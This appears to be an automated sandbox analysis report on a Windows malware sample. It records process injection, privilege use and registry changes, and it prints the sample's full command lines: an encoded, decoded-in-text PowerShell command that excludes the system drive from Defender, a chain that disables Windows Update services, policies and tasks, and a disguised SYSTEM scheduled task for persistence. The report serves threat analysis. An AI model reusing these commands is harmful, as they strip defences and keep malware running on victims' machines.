Analysis
- max time kernel: 268s
- max time network: 175s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 10-05-2022 04:50

Static task: static1
Behavioral task: behavioral1
Sample: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
Resource: win7-20220414-en
General
- Target: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
- Size: 2.0MB
- MD5: 79dbc1a54d33366681f1e926d565cad4
- SHA1: 907cf0ec6784bf140f9759d6931d3697da0fc229
- SHA256: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
- SHA512: 6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
Malware Config
Signatures
- Modifies security service (2 TTPs, 5 IoCs)
  Processes: reg.exe
    Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
    Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
    Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
    Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
    Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Executes dropped EXE (1 IoC)
  Processes: services.exe
    pid 4352 services.exe
- Possible privilege escalation attempt (4 IoCs)
  Processes: takeown.exe, icacls.exe, takeown.exe, icacls.exe
    pid 3692 takeown.exe
    pid 4484 icacls.exe
    pid 3472 takeown.exe
    pid 4848 icacls.exe
- Stops running service(s) (3 TTPs)
- Modifies file permissions (1 TTP, 4 IoCs)
  Processes: takeown.exe, icacls.exe, takeown.exe, icacls.exe
    pid 3692 takeown.exe
    pid 4484 icacls.exe
    pid 3472 takeown.exe
    pid 4848 icacls.exe
- Drops file in System32 directory (3 IoCs)
  Processes: powershell.exe, conhost.exe
    File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
    File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
    File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
- Suspicious use of SetThreadContext (1 IoC)
  Processes: conhost.exe
    PID 3460 (conhost.exe) set thread context of PID 4844 (conhost.exe)
- Drops file in Program Files directory (2 IoCs)
  Processes: conhost.exe
    File created: C:\Program Files\Windows\services.exe (conhost.exe)
    File opened for modification: C:\Program Files\Windows\services.exe (conhost.exe)
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies data under HKEY_USERS (52 IoCs)
  Processes: powershell.exe, conhost.exe
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (conhost.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (conhost.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (conhost.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (conhost.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (conhost.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
    Set value (data): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
    Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
    Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
- Modifies registry key (1 TTP, 18 IoCs)
  Processes: reg.exe (18 instances)
    pids: 4776, 4952, 5068, 5064, 4580, 3348, 5020, 1012, 4320, 3172, 4740, 4508, 2900, 1804, 2160, 4948, 2136, 4032 (all reg.exe)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe, conhost.exe, powershell.exe, conhost.exe
    pid 4736 powershell.exe (3 entries)
    pid 4700 conhost.exe
    pid 1088 powershell.exe (3 entries)
    pid 3460 conhost.exe
- Suspicious use of AdjustPrivilegeToken (39 IoCs)
  Processes: powershell.exe, conhost.exe, takeown.exe, powershell.exe, conhost.exe, takeown.exe
    pid 4736 powershell.exe, tokens: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    pid 4700 conhost.exe, tokens: SeDebugPrivilege
    pid 3692 takeown.exe, tokens: SeTakeOwnershipPrivilege
    pid 1088 powershell.exe, tokens: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
    pid 3460 conhost.exe, tokens: SeDebugPrivilege
    pid 3472 takeown.exe, tokens: SeTakeOwnershipPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, services.exe
  (source PID wrote to memory of target PID; source process -> target process; repeated entries counted)
    4016 -> 4700: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe -> conhost.exe (3 entries)
    4700 -> 2952: conhost.exe -> cmd.exe (2 entries)
    2952 -> 4736: cmd.exe -> powershell.exe (2 entries)
    4700 -> 2784: conhost.exe -> cmd.exe (2 entries)
    2784 -> 3472: cmd.exe -> sc.exe (2 entries)
    2784 -> 4848: cmd.exe -> sc.exe (2 entries)
    2784 -> 1648: cmd.exe -> sc.exe (2 entries)
    2784 -> 3052: cmd.exe -> sc.exe (2 entries)
    2784 -> 3456: cmd.exe -> sc.exe (2 entries)
    2784 -> 4776: cmd.exe -> reg.exe (2 entries)
    2784 -> 2160: cmd.exe -> reg.exe (2 entries)
    2784 -> 4948: cmd.exe -> reg.exe (2 entries)
    2784 -> 5064: cmd.exe -> reg.exe (2 entries)
    2784 -> 2136: cmd.exe -> reg.exe (2 entries)
    2784 -> 3692: cmd.exe -> takeown.exe (2 entries)
    4700 -> 2792: conhost.exe -> cmd.exe (2 entries)
    2784 -> 4484: cmd.exe -> icacls.exe (2 entries)
    2792 -> 4896: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 4580: cmd.exe -> reg.exe (2 entries)
    2784 -> 3348: cmd.exe -> reg.exe (2 entries)
    2784 -> 3172: cmd.exe -> reg.exe (2 entries)
    2784 -> 5020: cmd.exe -> reg.exe (2 entries)
    2784 -> 5012: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 3380: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 4932: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 4288: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 3236: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 3476: cmd.exe -> schtasks.exe (2 entries)
    2784 -> 4492: cmd.exe -> schtasks.exe (2 entries)
    4700 -> 3816: conhost.exe -> cmd.exe (2 entries)
    3816 -> 4628: cmd.exe -> schtasks.exe (2 entries)
    4352 -> 3460: services.exe -> conhost.exe (1 entry)
Processes
(tree depth shown as [n]; each entry gives the image path, its command line, and the signatures matched on that process)

[1] C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe  cmdline: "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\conhost.exe  cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
        - Drops file in Program Files directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
            (the -EncodedCommand value is base64 of UTF-16LE text and decodes to: <#ht#> Add-MpPreference <#cq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#lqvj#> -Force <#zhf#>, i.e. a Windows Defender exclusion for the user profile and the whole system drive, padded with junk block comments)
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop UsoSvc
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop WaaSMedicSvc
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop wuauserv
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop bits
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop dosvc
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                - Modifies security service
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                - Modifies registry key
            [4] C:\Windows\system32\takeown.exe  cmdline: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                - Possible privilege escalation attempt
                - Modifies file permissions
                - Suspicious use of AdjustPrivilegeToken
            [4] C:\Windows\system32\icacls.exe  cmdline: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                - Possible privilege escalation attempt
                - Modifies file permissions
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe  cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                - Creates scheduled task(s)
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\schtasks.exe  cmdline: schtasks /run /tn "GoogleUpdateTaskMachineQC"

[1] C:\Program Files\Windows\services.exe  cmdline: "C:\Program Files\Windows\services.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\conhost.exe  cmdline: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
            (same encoded Add-MpPreference exclusion command as in the first run)
            [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  cmdline: powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
                - Drops file in System32 directory
                - Modifies data under HKEY_USERS
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\cmd.exe  cmdline: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop UsoSvc
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop WaaSMedicSvc
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop wuauserv
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop bits
            [4] C:\Windows\system32\sc.exe  cmdline: sc stop dosvc
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                - Modifies registry key
            [4] C:\Windows\system32\takeown.exe  cmdline: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                - Possible privilege escalation attempt
                - Modifies file permissions
                - Suspicious use of AdjustPrivilegeToken
            [4] C:\Windows\system32\icacls.exe  cmdline: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                - Possible privilege escalation attempt
                - Modifies file permissions
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\reg.exe  cmdline: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                - Modifies registry key
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            [4] C:\Windows\system32\schtasks.exe  cmdline: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
